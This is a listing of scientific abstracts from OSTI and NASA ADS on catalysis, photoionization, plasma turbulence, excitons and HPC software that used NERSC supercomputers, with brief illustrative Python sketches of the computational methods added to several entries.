  9. Catalytic N2 Reduction to Silylamines and Thermodynamics of N2 Binding at Square Planar Fe

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Prokopchuk, Demyan E.; Wiedner, Eric S.; Walter, Eric D.

    The geometric constraints imposed by a tetradentate P4N2 ligand play an essential role in stabilizing square planar Fe complexes across changes in metal oxidation state. A combination of high-pressure electrochemistry and variable-temperature UV-vis spectroscopy was used to obtain thermodynamic measurements, while X-ray crystallography, 57Fe Mössbauer spectroscopy, and EPR spectroscopy were used to fully characterize these new compounds. Analysis of Fe0, FeI, and FeII complexes reveals that the free energy of N2 binding across the three oxidation states spans more than 37 kcal mol−1. The square pyramidal Fe0(N2)(P4N2) complex catalyzes the conversion of N2 to N(SiR3)3 (R = Me, Et) at room temperature, representing the highest turnover number (TON) of any Fe-based N2 silylation catalyst to date (up to 65 equiv N(SiMe3)3 per Fe center). Elevated N2 pressures (>1 atm) have a dramatic effect on catalysis, increasing N2 solubility and the thermodynamic N2 binding affinity at Fe0(N2)(P4N2). Acknowledgment. This research was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy (DOE), Office of Science, Office of Basic Energy Sciences. EPR experiments were performed using EMSL, a national scientific user facility sponsored by the DOE's Office of Biological and Environmental Research and located at Pacific Northwest National Laboratory (PNNL). PNNL is operated by Battelle for the U.S. DOE. Computational resources were provided by the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. The authors thank Prof. Yisong Alex Guo at Carnegie Mellon University for recording Mössbauer data for some complexes; Emma Wellington and Kaye Kuphal for their assistance with the collection of Mössbauer data at Colgate University; Dr. Katarzyna Grubel for X-ray assistance; and Dr. Rosalie Chu for mass spectrometry assistance. The authors also thank Dr. Aaron Appel and Dr. Alex Kendall for helpful discussions.

  10. A classical reactive potential for molecular clusters of sulphuric acid and water

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Stinson, Jake L.; Kathmann, Shawn M.; Ford, Ian J.

    2015-10-12

    We present a two-state empirical valence bond (EVB) potential describing interactions between sulphuric acid and water molecules, designed to model proton transfer between them within a classical dynamical framework. The potential has been developed in order to study the properties of molecular clusters of these species, which are thought to be relevant to atmospheric aerosol nucleation. The particle swarm optimisation method has been used to fit the parameters of the EVB model to density functional theory (DFT) calculations. Features of the parametrised model and DFT data are compared and found to be in satisfactory agreement. In particular, it is found that a single sulphuric acid molecule will donate a proton when clustered with four water molecules at 300 K, and that this threshold is temperature dependent. SMK was supported in part by the U.S. Department of Energy, Office of Science, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences, and Biosciences; JLS and IJF were supported by the IMPACT scheme at University College London (UCL). We acknowledge the UCL Legion High Performance Computing Facility and associated support services, together with the resources of the National Energy Research Scientific Computing Center (NERSC), which is supported by the U.S. Department of Energy under Contract No. DE-AC02-05CH11231. JLS thanks Dr. Gregory Schenter, Dr. Theo Kurtén and Prof. Hanna Vehkamäki for important guidance and discussions.
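
    In a two-state EVB model of the kind described above, the classical potential energy is the lower eigenvalue of a 2x2 Hamiltonian built from two diabatic energies (intact acid vs. transferred proton) and a coupling term. The sketch below shows only that eigenvalue step; the diabatic functional forms and the particle-swarm-fitted parameters of the paper are not reproduced, and all inputs are placeholders.

```python
import math

# Two-state EVB sketch: the ground-state energy is the lower eigenvalue of
# [[V1, V12], [V12, V2]], where V1, V2 are diabatic (reactant/product)
# energies and V12 the coupling. Inputs are illustrative placeholders.

def evb_ground_energy(v1: float, v2: float, v12: float) -> float:
    mean = 0.5 * (v1 + v2)
    gap = 0.5 * (v1 - v2)
    return mean - math.sqrt(gap * gap + v12 * v12)

# At the diabatic crossing (V1 == V2) the coupling lowers the energy by |V12|:
assert abs(evb_ground_energy(1.0, 1.0, 0.2) - 0.8) < 1e-12
```

    Evaluating this surface along a molecular-dynamics trajectory is what lets a classical framework describe proton transfer smoothly between the two bonding topologies.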

  11. Challenges in scaling NLO generators to leadership computers

    NASA Astrophysics Data System (ADS)

    Benjamin, D.; Childers, JT; Hoeche, S.; LeCompte, T.; Uram, T.

    2017-10-01

    Exascale computing resources are roughly a decade away and will be capable of 100 times more computing than current supercomputers. In the last year, Energy Frontier experiments crossed a milestone of 100 million core-hours used at the Argonne Leadership Computing Facility, Oak Ridge Leadership Computing Facility, and NERSC. The Fortran-based leading-order parton generator Alpgen was successfully scaled to millions of threads to achieve this level of usage on Mira. Sherpa and MadGraph are next-to-leading-order generators used heavily by LHC experiments for simulation. Integration times for high-multiplicity or rare processes can take a week or more on standard Grid machines, even when using all 16 cores. We describe our ongoing work to scale the Sherpa generator to thousands of threads on leadership-class machines and reduce run times to less than a day. This work allows the experiments to leverage large-scale parallel supercomputers for event generation today, freeing tens of millions of grid hours for other work, and paving the way for future applications (simulation, reconstruction) on these and future supercomputers.

  12. Inner-shell photoionization of atomic chlorine near the 2p⁻¹ edge: a Breit-Pauli R-matrix calculation

    NASA Astrophysics Data System (ADS)

    Felfli, Z.; Deb, N. C.; Manson, S. T.; Hibbert, A.; Msezane, A. Z.

    2009-05-01

    An R-matrix calculation which takes into account relativistic effects via the Breit-Pauli (BP) operator is performed for photoionization cross sections of atomic Cl near the 2p threshold. The wavefunctions are constructed with orbitals generated from a careful large-scale configuration interaction (CI) calculation with relativistic corrections using the CIV3 code of Hibbert [1] and Glass and Hibbert [2]. The results are contrasted with the calculation of Martins [3], which uses CI with relativistic corrections, and compared with the most recent measurements [4]. [1] A. Hibbert, Comput. Phys. Commun. 9, 141 (1975); [2] R. Glass and A. Hibbert, Comput. Phys. Commun. 16, 19 (1978); [3] M. Martins, J. Phys. B 34, 1321 (2001); [4] D. Lindle et al. (private communication). Research supported by U.S. DOE, Division of Chemical Sciences, NSF, and the CAU CFNM NSF-CREST Program. Computing facilities at Queen's University Belfast, UK, and at NERSC (DOE Office of Science) are appreciated.

  13. Photoionization of Li2

    NASA Astrophysics Data System (ADS)

    Li, Y.; Pindzola, M. S.; Ballance, C. P.; Colgan, J.

    2014-05-01

    Single and double photoionization cross sections for Li2 are calculated using a time-dependent close-coupling method. The correlation between the outer two electrons of Li2 is obtained by relaxation of the close-coupled equations in imaginary time. Propagation of the close-coupled equations in real time yields single and double photoionization cross sections for Li2. The two active electron cross sections are compared with one active electron distorted-wave and close-coupling results for both Li and Li2. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California, NICS in Knoxville, Tennessee, and OLCF in Oak Ridge, Tennessee.
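
    The imaginary-time relaxation step mentioned above (and reused in several of the close-coupling abstracts in this list) rests on a simple idea: repeatedly applying exp(−H·dt) to a trial state and renormalising damps every excited component faster than the ground state. The toy below demonstrates this on a 2x2 symmetric matrix standing in for the close-coupled Hamiltonian; it is a pedagogical sketch, not the authors' code.

```python
import math

# Imaginary-time relaxation on a toy Hamiltonian. exp(-H*dt) is approximated
# to first order by (1 - H*dt); after many normalised steps only the lowest
# eigenvector survives. H below has eigenvalues 1 and 3.

H = [[2.0, -1.0], [-1.0, 2.0]]

def relax(psi, dt=0.1, steps=500):
    for _ in range(steps):
        hpsi = [sum(H[i][j] * psi[j] for j in range(2)) for i in range(2)]
        psi = [psi[i] - dt * hpsi[i] for i in range(2)]        # one Euler step
        norm = math.sqrt(sum(c * c for c in psi))
        psi = [c / norm for c in psi]                          # renormalise
    return psi

psi = relax([1.0, 0.0])
energy = sum(psi[i] * sum(H[i][j] * psi[j] for j in range(2)) for i in range(2))
assert abs(energy - 1.0) < 1e-6  # converged to the lowest eigenvalue
```

    Real-time propagation of the same equations, by contrast, keeps the full unitary dynamics and is what yields the photoionization cross sections.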

  14. Simulating contrast inversion in atomic force microscopy imaging with real-space pseudopotentials

    NASA Astrophysics Data System (ADS)

    Lee, Alex; Sakai, Yuki; Chelikowsky, James

    Atomic force microscopy measurements have reported contrast inversions for systems such as Cu2N and graphene that can hamper image interpretation and characterization. Here, we apply a simulation method based on ab initio real-space pseudopotentials to gain an understanding of the tip-sample interactions that influence the inversion. We find that chemically reactive tips induce an attractive binding force that results in the contrast inversion. The inversion is tip height dependent and not observed when using less reactive CO-functionalized tips. Work is supported by the DOE under DOE/DE-FG02-06ER46286 and by the Welch Foundation under Grant F-1837. Computational resources were provided by NERSC and XSEDE.

  15. Flux-driven turbulence GDB simulations of the IWL Alcator C-Mod L-mode edge compared with experiment

    NASA Astrophysics Data System (ADS)

    Francisquez, Manaure; Zhu, Ben; Rogers, Barrett

    2017-10-01

    Prior to predicting confinement regime transitions in tokamaks, one may need an accurate description of L-mode profiles and turbulence properties. These features determine the heat-flux width upon which wall integrity depends, a topic of major interest for ITER. To this end our work uses the GDB model to simulate the Alcator C-Mod edge, and contributes support for its use in studying critical edge phenomena in current and future tokamaks. We carried out 3D electromagnetic flux-driven two-fluid turbulence simulations of inner wall limited (IWL) C-Mod shots spanning closed and open flux surfaces. These simulations are compared with gas puff imaging (GPI) and mirror Langmuir probe (MLP) data, examining global features and statistical properties of the turbulent dynamics. GDB reproduces, within reasonable margins, important qualitative aspects of the C-Mod edge such as the global density and temperature profiles, and while the simulated turbulence statistics follow similar quantitative trends, questions remain about the code's difficulty in exactly predicting quantities like the autocorrelation time. A proposed breakpoint in the near-SOL pressure, and the posited separation between drift and ballooning dynamics that it represents, are also examined. This work was supported by DOE-SC-0010508. This research used resources of the National Energy Research Scientific Computing Center (NERSC).
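
    One common way to compute the autocorrelation time mentioned above, when comparing simulated and measured turbulence statistics, is the integrated autocorrelation time: sum the normalised autocorrelation function over lags up to its first zero crossing. The sketch below uses that standard estimator; the actual GPI/MLP analysis in the paper may use a different convention.

```python
# Integrated autocorrelation time of a time series: tau = 1/2 + sum of the
# normalised ACF over positive lags, truncated at the first non-positive
# value. A standard estimator, shown here for illustration only.

def autocorrelation_time(x):
    n = len(x)
    mean = sum(x) / n
    var = sum((v - mean) ** 2 for v in x) / n
    tau = 0.5  # lag-0 contributes 1/2 in this convention
    for lag in range(1, n):
        acf = sum((x[i] - mean) * (x[i + lag] - mean)
                  for i in range(n - lag)) / ((n - lag) * var)
        if acf <= 0.0:
            break
        tau += acf
    return tau

# A rapidly alternating (anti-correlated) signal has the minimal tau of 1/2:
assert autocorrelation_time([1.0, -1.0] * 4) == 0.5
```

    Slowly varying signals accumulate many positive ACF terms and so return a large tau, which is exactly the quantity that is hard to match between code and experiment.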

  16. In Situ Fabrication of PtCo Alloy Embedded in Nitrogen-Doped Graphene Nanopores as Synergistic Catalyst for Oxygen Reduction Reaction

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Zhong, Xing; Wang, Lei; Zhou, Hu

    A novel PtCo alloy in situ etched and embedded in graphene nanopores (PtCo/NPG) is reported as a high-performance catalyst for the oxygen reduction reaction (ORR). Graphene nanopores were fabricated in situ while forming PtCo nanoparticles that were uniformly embedded in the nanopores. Owing to the synergistic effect between the PtCo alloy and the nanopores, PtCo/NPG exhibited 11.5 times higher mass activity than the commercial Pt/C cathode electrocatalyst. DFT calculations indicated that the nanopores in NPG not only stabilize the PtCo nanoparticles but also distinctly change their electronic structure, thereby changing their adsorption abilities. This enhancement can lead to a favorable reaction pathway on PtCo/NPG for ORR. This study showed that PtCo/NPG is a potential candidate for the next generation of Pt-based catalysts in fuel cells. It also offers a promising alternative strategy enabling the fabrication of various kinds of metal/graphene-nanopore nanohybrids with potential applications in catalysis and in other technological devices. The authors acknowledge the financial support from the National Basic Research Program (973 program, No. 2013CB733501), the Zhejiang Provincial Education Department Research Program (Y201326554) and the National Natural Science Foundation of China (No. 21306169, 21101137, 21136001, 21176221 and 91334013). D. Mei acknowledges the support from the US Department of Energy, Office of Science, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. Computing time was granted by the grand challenge of computational catalysis of the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC).

  17. Spectroscopy of organic semiconductors from first principles

    NASA Astrophysics Data System (ADS)

    Sharifzadeh, Sahar; Biller, Ariel; Kronik, Leeor; Neaton, Jeffery

    2011-03-01

    Advances in organic optoelectronic materials rely on an accurate understanding of their spectroscopy, motivating the development of predictive theoretical methods that accurately describe the excited states of organic semiconductors. In this work, we use density functional theory and many-body perturbation theory (GW/BSE) to compute the electronic and optical properties of two well-studied organic semiconductors, pentacene and PTCDA. We carefully compare our calculations of the bulk density of states with available photoemission spectra, accounting for the role of finite temperature and surface effects in experiment, and examining the influence of our main approximations -- e.g. the GW starting point and the application of the generalized plasmon-pole model -- on the predicted electronic structure. Moreover, our predictions for the nature of the exciton and its binding energy are discussed and compared against optical absorption data. We acknowledge DOE, NSF, and BASF for financial support and NERSC for computational resources.

  18. First-Principles Studies of the Excited States and Optical Properties of Xanthene Derivative Chromophores

    NASA Astrophysics Data System (ADS)

    Hamed, Samia; Sharifzadeh, Sahar; Neaton, Jeffrey

    2014-03-01

    Elucidation of the energy transfer mechanism in natural photosynthetic systems remains an exciting challenge. In particular, biomimetic protein-pigment complexes provide a unique study space in which individual parameters are adjusted and the impact of those changes captured. Here, we compute the excited state properties of a group of xanthene-derivative chromophores to be employed in the construction of new biomimetic light harvesting frameworks. Excitation energies, transition dipoles, and natural transition orbitals for the low-lying singlet and triplet states of these experimentally-relevant chromophores are obtained from first-principles density functional theory. The performance of several exchange-correlation functionals, including an optimally-tuned range-separated hybrid, are evaluated and compared with many body perturbation theory and experiment. Finally, we will discuss the implication of our results for the bottom-up design of new chromophores. This work is supported by the DOE and computational resources are provided by NERSC.

  19. Understanding Singlet and Triplet Excitons in Acene Crystals from First Principles

    NASA Astrophysics Data System (ADS)

    Rangel Gordillo, Tonatiuh; Sharifzadeh, Sahar; Kronik, Leeor; Neaton, Jeffrey

    2014-03-01

    Singlet fission, a process in which two triplet excitons are formed from a singlet exciton, has the potential to increase solar cell external quantum efficiencies above 100%. Efficient singlet fission has been reported in the larger acene crystals, such as tetracene and pentacene, in part attributable to their low-lying triplet energies. In this work, we use many-body perturbation theory within the GW approximation and the Bethe-Salpeter equation approach to compute quasiparticle gaps, low-lying singlet and triplet excitations, and optical absorption spectra across the entire acene family of crystals, from benzene to hexacene. We closely examine the degree of localization and charge-transfer character of the low-lying singlets and triplets, and their sensitivity to the crystal environment, and discuss implications for the efficiency of singlet fission in these systems. This work was supported by DOE and computational resources were provided by NERSC.

  20. Protonation Studies of a Tungsten Dinitrogen Complex Supported by a Diphosphine Ligand Containing a Pendant Amine

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Weiss, Charles J.; Egbert, Jonathan D.; Chen, Shentan

    2014-04-28

    Treatment of trans-[W(N2)2(dppe)(PEtNMePEt)] (dppe = Ph2PCH2CH2PPh2; PEtNMePEt = Et2PCH2N(Me)CH2PEt2) with three equivalents of tetrafluoroboric acid (HBF4∙Et2O) at -78 °C generated the seven-coordinate tungsten hydride trans-[W(N2)2(H)(dppe)(PEtNMePEt)][BF4]. Depending on the temperature of the reaction, protonation of a pendant amine is also observed, affording trans-[W(N2)2(H)(dppe)(PEtNMe(H)PEt)][BF4]2, with formation of the hydrazido complex [W(NNH2)(dppe)(PEtNMe(H)PEt)][BF4]2 as a minor product. Similar product mixtures were obtained using triflic acid (HOTf). Upon acid addition to the carbonyl analogue, cis-[W(CO)2(dppe)(PEtNMePEt)], the seven-coordinate carbonyl-hydride complex trans-[W(CO)2(H)(dppe)(PEtN(H)MePEt)][OTf]2 was generated. The mixed diphosphine complex without the pendant amine in the ligand backbone, trans-[W(N2)2(dppe)(depp)] (depp = Et2P(CH2)3PEt2), was synthesized and treated with HBF4∙Et2O, selectively generating a hydrazido complex, [W(NNH2)(F)(dppe)(depp)][BF4]. Computational analysis was used to probe the proton affinities of the three sites of protonation, the metal, the pendant amine, and the N2 ligand, in these complexes. Room-temperature reactions with 100 equivalents of HOTf produced NH4+ from reduction of the N2 ligand (the electrons come from W). The addition of 100 equivalents of HOTf to trans-[W(N2)2(dppe)(PEtNMePEt)] afforded 0.88 ± 0.02 equivalents of NH4+, while 0.36 ± 0.02 equivalents of NH4+ was formed upon treatment of trans-[W(N2)2(dppe)(depp)], the complex without the pendant amine. This work was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy Office of Science, Office of Basic Energy Sciences. Computational resources were provided by the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. Pacific Northwest National Laboratory is operated by Battelle for DOE.

  1. First-principles quantum-mechanical investigations: The role of water in catalytic conversion of furfural on Pd(111)

    NASA Astrophysics Data System (ADS)

    Xue, Wenhua; Borja, Miguel Gonzalez; Resasco, Daniel E.; Wang, Sanwu

    2015-03-01

    In the study of catalytic reactions of biomass, furfural conversion over metal catalysts in the presence of water has attracted wide attention. Recent experiments showed that the proportion of alcohol product from catalytic furfural conversion over palladium in the presence of water is significantly increased compared with other solvents, including dioxane, decalin, and ethanol. We investigated the microscopic mechanism of the reactions based on first-principles quantum-mechanical calculations. We particularly identified the important role of water and the liquid/solid interface in furfural conversion. Our results provide atomic-scale details for the catalytic reactions. Supported by DOE (DE-SC0004600). This research used the supercomputer resources at NERSC, of XSEDE, at TACC, and at the Tandy Supercomputing Center.

  2. Energy Efficient Supercomputing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Antypas, Katie

    2014-10-17

    Katie Antypas, Head of NERSC's Services Department, discusses the Lab's research into developing increasingly powerful and energy efficient supercomputers at the '8 Big Ideas' Science at the Theater event on October 8th, 2014, in Oakland, California.

  3. Energy Efficient Supercomputing

    ScienceCinema

    Antypas, Katie

    2018-05-07

    Katie Antypas, Head of NERSC's Services Department, discusses the Lab's research into developing increasingly powerful and energy efficient supercomputers at the '8 Big Ideas' Science at the Theater event on October 8th, 2014, in Oakland, California.

  4. Efficient Calculation of Exact Exchange Within the Quantum Espresso Software Package

    NASA Astrophysics Data System (ADS)

    Barnes, Taylor; Kurth, Thorsten; Carrier, Pierre; Wichmann, Nathan; Prendergast, David; Kent, Paul; Deslippe, Jack

    Accurate simulation of condensed matter at the nanoscale requires careful treatment of the exchange interaction between electrons. In the context of plane-wave DFT, these interactions are typically represented through the use of approximate functionals. Greater accuracy can often be obtained through the use of functionals that incorporate some fraction of exact exchange; however, evaluation of the exact exchange potential is often prohibitively expensive. We present an improved algorithm for the parallel computation of exact exchange in Quantum Espresso, an open-source software package for plane-wave DFT simulation. Through the use of aggressive load balancing and on-the-fly transformation of internal data structures, our code exhibits speedups of approximately an order of magnitude for practical calculations. Additional optimizations are presented targeting the many-core Intel Xeon-Phi ``Knights Landing'' architecture, which largely powers NERSC's new Cori system. We demonstrate the successful application of the code to difficult problems, including simulation of water at a platinum interface and computation of the X-ray absorption spectra of transition metal oxides.
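
    The "aggressive load balancing" described above can be illustrated with the classic longest-processing-time greedy heuristic: sort work items (here, band pairs of uneven cost) in decreasing order and always assign the next item to the least loaded rank. This is a toy version of the idea only; the actual Quantum Espresso implementation also transforms internal data structures on the fly, which is not modelled here, and all costs below are made up.

```python
import heapq

# Greedy LPT load balancing: give each work item, largest first, to the
# currently least loaded rank. Costs are hypothetical band-pair work units.

def balance(costs, nranks):
    heap = [(0, r, []) for r in range(nranks)]   # (load, rank id, items)
    heapq.heapify(heap)
    for cost in sorted(costs, reverse=True):
        load, r, items = heapq.heappop(heap)     # least loaded rank
        items.append(cost)
        heapq.heappush(heap, (load + cost, r, items))
    return sorted(heap)

ranks = balance([5, 3, 3, 2, 2, 1], nranks=2)
assert [load for load, _, _ in ranks] == [8, 8]  # evenly split in this example
```

    With uniform static partitioning the same items could leave one rank idle while another finishes its expensive pairs, which is the imbalance the production code works to avoid.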

  5. Exploring the Influence of Dynamic Disorder on Excitons in Solid Pentacene

    NASA Astrophysics Data System (ADS)

    Wang, Zhiping; Sharifzadeh, Sahar; Doak, Peter; Lu, Zhenfei; Neaton, Jeffrey

    2014-03-01

    A complete understanding of the spectroscopic and charge transport properties of organic semiconductors requires knowledge of the role of thermal fluctuations and dynamic disorder. We present a first-principles theoretical study aimed at understanding the degree to which dynamic disorder at room temperature results in energy level broadening and excited-state localization within bulk crystalline pentacene. Ab initio molecular dynamics simulations are well-equilibrated for 7-9 ps and tens of thousands of structural snapshots, taken at 0.5 fs intervals, provide input for many-body perturbation theory within the GW approximation and Bethe-Salpeter equation (BSE) approach. The GW-corrected density of states, including thousands of snapshots, indicates that thermal fluctuations significantly broaden the valence and conduction states by >0.2 eV. Additionally, we investigate the nature and energy of the lowest energy singlet and triplet excitons, computed for a set of uncorrelated and energetically preferred structures. This work supported by DOE; computational resources provided by NERSC.

  6. Single and Double Photoionization of Mg

    NASA Astrophysics Data System (ADS)

    Abdel-Naby, Shahin; Pindzola, M. S.; Colgan, J.

    2014-05-01

    Single and double photoionization cross sections for Mg are calculated using a time-dependent close-coupling method. The correlation between the two 3s subshell electrons of Mg is obtained by relaxation of the close-coupled equations in imaginary time. An implicit method is used to propagate the close-coupled equations in real time to obtain single and double ionization cross sections for Mg. Energy and angle triple differential cross sections for double photoionization at equal energy sharing of E1 = E2 = 16.4 eV are compared with Elettra experiments and previous theoretical calculations. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California, NICS in Knoxville, Tennessee, and OLCF in Oak Ridge, Tennessee.

  7. Photoionization of Ne8+

    NASA Astrophysics Data System (ADS)

    Pindzola, M. S.; Abdel-Naby, Sh. A.; Robicheaux, F.; Colgan, J.

    2014-05-01

    Single and double photoionization cross sections for Ne8+ are calculated using a non-perturbative fully relativistic time-dependent close-coupling method. A Bessel function expansion is used to include both dipole and quadrupole effects in the radiation field interaction and the repulsive interaction between electrons includes both the Coulomb and Gaunt interactions. The fully correlated ground state of Ne8+ is obtained by solving a time-independent inhomogeneous set of close-coupled equations. Propagation of the time-dependent close-coupled equations yields single and double photoionization cross sections for Ne8+ at energies easily accessible at advanced free electron laser facilities. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California, NICS in Knoxville, Tennessee, and OLCF in Oak Ridge, Tennessee.

  8. Neutron-Impact Ionization of H and He

    NASA Astrophysics Data System (ADS)

    Lee, T.-G.; Ciappina, M. F.; Robicheaux, F.; Pindzola, M. S.

    2014-05-01

    Perturbative distorted-wave and non-perturbative close-coupling methods are used to study neutron-impact ionization of H and He. For single ionization of H, we find excellent agreement between the distorted-wave and close-coupling results at all incident energies. For double ionization of He, we find poor agreement between the distorted-wave and close-coupling results, except at the highest incident energies. We present the ratio of double to single ionization for He as a guide to experimental checks of theory at low energies and experimental confirmation of the rapid rise of the ratio at high energies. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California, NICS in Knoxville, Tennessee, and OLCF in Oak Ridge, Tennessee.

  9. Large Scale GW Calculations on the Cori System

    NASA Astrophysics Data System (ADS)

    Deslippe, Jack; Del Ben, Mauro; da Jornada, Felipe; Canning, Andrew; Louie, Steven

    The NERSC Cori system, powered by 9000+ Intel Xeon-Phi processors, represents one of the largest HPC systems for open-science in the United States and the world. We discuss the optimization of the GW methodology for this system, including both node level and system-scale optimizations. We highlight multiple large scale (thousands of atoms) case studies and discuss both absolute application performance and comparison to calculations on more traditional HPC architectures. We find that the GW method is particularly well suited for many-core architectures due to the ability to exploit a large amount of parallelism across many layers of the system. This work was supported by the U.S. Department of Energy, Office of Science, Basic Energy Sciences, Materials Sciences and Engineering Division, as part of the Computational Materials Sciences Program.

  10. Graphics Processing Unit Acceleration of Gyrokinetic Turbulence Simulations

    NASA Astrophysics Data System (ADS)

    Hause, Benjamin; Parker, Scott

    2012-10-01

    We find a substantial increase in on-node performance using Graphics Processing Unit (GPU) acceleration in gyrokinetic delta-f particle-in-cell simulation. Optimization is performed on a two-dimensional slab gyrokinetic particle simulation using the Portland Group Fortran compiler with GPU accelerator compiler directives. We have implemented the GPU acceleration on a Core i7 gaming PC with an NVIDIA GTX 580 GPU. We find comparable, or better, acceleration relative to the NERSC DIRAC cluster with the NVIDIA Tesla C2050 computing processor. The Tesla C2050 is about 2.6 times more expensive than the GTX 580 gaming GPU. Optimization strategies and comparisons between DIRAC and the gaming PC will be presented. We will also discuss progress on optimizing the comprehensive three-dimensional general-geometry GEM code.

  11. Auger recombination in sodium iodide

    NASA Astrophysics Data System (ADS)

    McAllister, Andrew; Kioupakis, Emmanouil; Åberg, Daniel; Schleife, André

    2014-03-01

    Scintillators are an important tool used to detect high energy radiation - both in the interest of national security and in medicine. However, scintillator detectors currently suffer from lower energy resolutions than expected from basic counting statistics. This has been attributed to non-proportional light yield compared to incoming radiation, but the specific mechanism for this non-proportionality has not been identified. Auger recombination is a non-radiative process that could be contributing to the non-proportionality of scintillating materials. Auger recombination comes in two types - direct and phonon-assisted. We have used first-principles calculations to study Auger recombination in sodium iodide, a well characterized scintillating material. Our findings indicate that phonon-assisted Auger recombination is stronger in sodium iodide than direct Auger recombination. Computational resources provided by LLNL and NERSC. Funding provided by NA-22.

  12. Toward Rational Design of Cu/SSZ-13 Selective Catalytic Reduction Catalysts: Implications from Atomic-Level Understanding of Hydrothermal Stability

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Song, James; Wang, Yilin; Walter, Eric D.

    The hydrothermal stability of Cu/SSZ-13 SCR catalysts has been extensively studied, yet an atomic-level understanding of the changes to the zeolite support and the Cu active sites during hydrothermal aging is still lacking. In this work, using spectroscopic methods including solid-state 27Al and 29Si NMR, EPR, DRIFTS, and XPS, together with imaging and elemental mapping by STEM, detailed kinetic analyses, and theoretical calculations with DFT, various Cu species, including two types of isolated active sites and CuOx clusters, were precisely quantified for samples hydrothermally aged under varying conditions. This quantification convincingly confirms the exceptional hydrothermal stability of isolated Cu2+-2Z sites, and the gradual conversion of [Cu(OH)]+-Z to CuOx clusters with increasing aging severity. This stability difference is rationalized via DFT from the difference in hydrolysis activation barriers between the two isolated sites. The nature of the CuOx clusters and their possible detrimental roles in catalyst stability are discussed. Finally, a few rational design principles for Cu/SSZ-13 are derived rigorously from the atomic-level understanding of this catalyst obtained here. The authors gratefully acknowledge the US Department of Energy (DOE), Energy Efficiency and Renewable Energy, Vehicle Technologies Office for the support of this work. Computing time was granted by a user proposal at the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC). The experimental studies described in this paper were performed in EMSL, a national scientific user facility sponsored by the DOE's Office of Biological and Environmental Research and located at Pacific Northwest National Laboratory (PNNL). PNNL is operated for the US DOE by Battelle.

  13. DEEP: Database of Energy Efficiency Performance

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Hong, Tianzhen; Piette, Mary; Lee, Sang Hoon

    A database of energy efficiency performance (DEEP) is a presimulated database that enables quick and accurate assessment of energy retrofits of commercial buildings. DEEP was compiled from the results of about 10 million EnergyPlus simulations. DEEP provides energy savings for screening and evaluation of retrofit measures targeting small and medium-sized office and retail buildings in California. The prototype building models are developed for a comprehensive assessment of building energy performance based on the DOE commercial reference buildings and the California DEER prototype buildings. The prototype buildings represent seven building types across six construction vintages and 16 California climate zones. DEEP uses these prototypes to evaluate the energy performance of about 100 energy conservation measures covering envelope, lighting, heating, ventilation, air conditioning, plug loads, and domestic hot water. DEEP consists of the energy simulation results for individual retrofit measures as well as packages of measures, to account for interactive effects between multiple measures. The large-scale EnergyPlus simulations are being conducted on the supercomputers at the National Energy Research Scientific Computing Center (NERSC) of Lawrence Berkeley National Laboratory. The presimulated database is part of a CEC PIER project to develop a web-based retrofit toolkit for small and medium-sized commercial buildings in California, which provides real-time energy retrofit feedback by querying DEEP for recommended measures, estimated energy savings, and financial payback period based on users' decision criteria of maximizing energy savings, energy cost savings, carbon reduction, or payback of investment.
    The presimulated database and the associated comprehensive measure analysis enhance the ability to assess retrofits that reduce energy use in small and medium buildings, whose owners typically do not have the resources to conduct costly building energy audits.
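The payback-ranking logic described above can be sketched in a few lines. The records and field names below are illustrative stand-ins, not DEEP's actual schema or data:

```python
# Hypothetical sketch of querying a presimulated retrofit database like DEEP:
# each record holds annual savings and cost for one measure (made-up numbers).
measures = [
    {"name": "LED lighting",      "kwh_saved": 12000, "cost": 8000, "kwh_rate": 0.18},
    {"name": "Roof insulation",   "kwh_saved": 5000,  "cost": 9000, "kwh_rate": 0.18},
    {"name": "Smart thermostats", "kwh_saved": 3000,  "cost": 1200, "kwh_rate": 0.18},
]

def payback_years(m):
    """Simple payback: cost divided by annual energy cost savings."""
    return m["cost"] / (m["kwh_saved"] * m["kwh_rate"])

# Rank measures by the user's decision criterion, e.g. fastest payback.
ranked = sorted(measures, key=payback_years)
for m in ranked:
    print(f'{m["name"]}: payback {payback_years(m):.1f} years')
```

A real toolkit would also weight the other criteria mentioned (energy savings, carbon, cost), but the query-and-rank pattern is the same.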

  14. STAR Data Reconstruction at NERSC/Cori, an adaptable Docker container approach for HPC

    NASA Astrophysics Data System (ADS)

    Mustafa, Mustafa; Balewski, Jan; Lauret, Jérôme; Porter, Jefferson; Canon, Shane; Gerhardt, Lisa; Hajdu, Levente; Lukascsyk, Mark

    2017-10-01

    As HPC facilities grow their resources, adaptation of classic HEP/NP workflows becomes a necessity. Linux containers may well offer a way to lower the bar to exploiting such resources and, at the same time, help collaborations reach vast elastic resources on such facilities to address their massive current and future data-processing challenges. In this proceeding, we showcase the STAR data reconstruction workflow on the Cori HPC system at NERSC. STAR software is packaged in a Docker image and runs on Cori in Shifter containers. We highlight two of the typical end-to-end optimization challenges for such pipelines: 1) the data transfer rate, carried over ESnet after optimizing the endpoints, and 2) scalable deployment of a conditions database in an HPC environment. Our tests demonstrate that data processing workflows on Cori are as efficient as those on standard Linux clusters.

  15. Aqueous Cation-Amide Binding: Free Energies and IR Spectral Signatures by Ab Initio Molecular Dynamics

